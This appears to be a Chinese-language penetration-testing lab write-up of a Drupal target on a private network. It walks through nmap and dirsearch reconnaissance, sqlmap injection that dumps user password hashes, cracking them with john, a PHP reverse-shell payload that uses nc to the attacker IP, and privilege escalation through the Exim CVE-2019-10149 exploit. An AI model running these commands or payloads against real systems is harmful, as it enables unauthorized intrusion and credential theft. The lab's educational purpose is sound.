)
攻击机:192.168.10.40
靶机:192.168.10.130
探测内网存活主机
扫描端口
nmap -A -p- -T4 192.168.10.0/24
-A =
-O # 操作系统识别
-sV # 服务与版本探测
-sC # 默认 NSE 脚本
--traceroute
-p-:全端口扫描
-T4: -T决定的是时间控制策略,
- 探测并发数
- 超时阈值
- 重传次数
- RTT 估算
- 主机并行度
信息类型 | 详细内容 |
IP 地址 |
|
主机状态 |
(主机在线) |
延迟 |
(极低延迟,表明在本地网络) |
网络距离 |
(1 跳,直接连接) |
MAC 地址 |
|
制造商 |
(主机运行在 VMware 虚拟机环境中) |
操作系统 (推测) | 运行:`Linux 3.X |
设备类型 |
(通用设备) |
在robots.txt文件中列举出了32个禁止访问的路径。
扫描目录
dirsearch -u "http://192.168.10.130" -e* -i 200
-e*(星号) 的作用是:告诉 dirsearch 使用它配置文件中定义的所有默认扩展名进行测试。
-i 200:只显示200响应码的
访问网页,收集网站信息
Web渗透
访问网页,点击下面三个标签,nid会随着变化,说明这个界面是通过nid号控制的。在数字后面加个双引号,
会报一个数据库错误,很明显这存在SQL注入漏洞。
SQL注入
sqlmap直接跑,三个注入方式:数字注入,报错注入,时间注入。
sqlmap -u 'http://192.168.10.130/?nid=1' --batch
爆破数据库
sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 --dbs
information_schema是系统数据库,d7db是我们要查询的对象
爆破数据表
sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db --tables
爆破字段
sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users --columns
在字段列表中name和pass两个字段
查看字段内容
sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users -C name,pass --dump
得到用户名和加密后的密码
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
密码破解
把密码放入一个.txt文本中,使用john工具对密码进行解密,破解出一个密码,这个密码是john的,admin的密码没有破解出来。
john/turtle直接登录网站
可用在里面写入一个木马
写入一个木马
随便填入信息之后提交
传入的php代码执行了
可用执行PHP代码就可以开始反弹shell了。
<?php system('nc -e /bin/bash 192.168.10.40 5555');?>
攻击机开始监听
连接成功
执行python代码获取一个交互式的shell。
python -c "import pty;pty.spawn('/bin/bash')"
权限为www
权限提升
查看具有suid提权的文件,在列出的文件中有一个exim4文件,这是个漏洞点( CVE-2019-10149,即 Exim 4.87-4.91 的 "Return of the WIZard" 漏洞 )。
find / -user root -perm -4000 -print 2>/dev/null
searchsploit exim 4搜索相关漏洞,把漏洞的脚本复制下来。
searchsploit的作用:在本地库中快速查找软件已经公开的漏洞利用代码(POC)。
复制脚本
把脚本下载到靶机中
先把脚本放到攻击机中的/var/www/html目录下,随后开启apache服务
在靶机的/tmp目录中下载脚本,其它目录没有下载权限,在列出的权限列表中,当前目录的权限最后一位为t,这个是/tmp目录的安全特性,写入和读取权限:目录的rwx权限允许任何用户在/tmp中创建、写入和读取文件。 他也有个限制 :一个用户只能删除或重命名由他自己创建的文件。
给脚本添加权限并执行脚本
成功提权
在/root目录下找到了flag,查看flag。
使用的相关工具:
nmap端口探测
sqlmap 数据库爆破
网站漏洞反弹shell
john密码破解
searchsploit 漏洞利用工具
总结:
端口探测出可使用的端口,以及对应的服务,如果有可访问的网站之后对网站做信息收集,收集网站使用的架构,前端和后端的信息,找到相关搜索框进行测试,SQL语句,XSS,命令注入,文件包含等都可以进行测试,找到响应的漏洞点之后,进行针对性的测试,比如说使用工具,sqlmap,bp,手动注入等。在找到漏洞点后,扩大漏洞的危害,找寻网站的相关漏洞的payload,提权拿root。
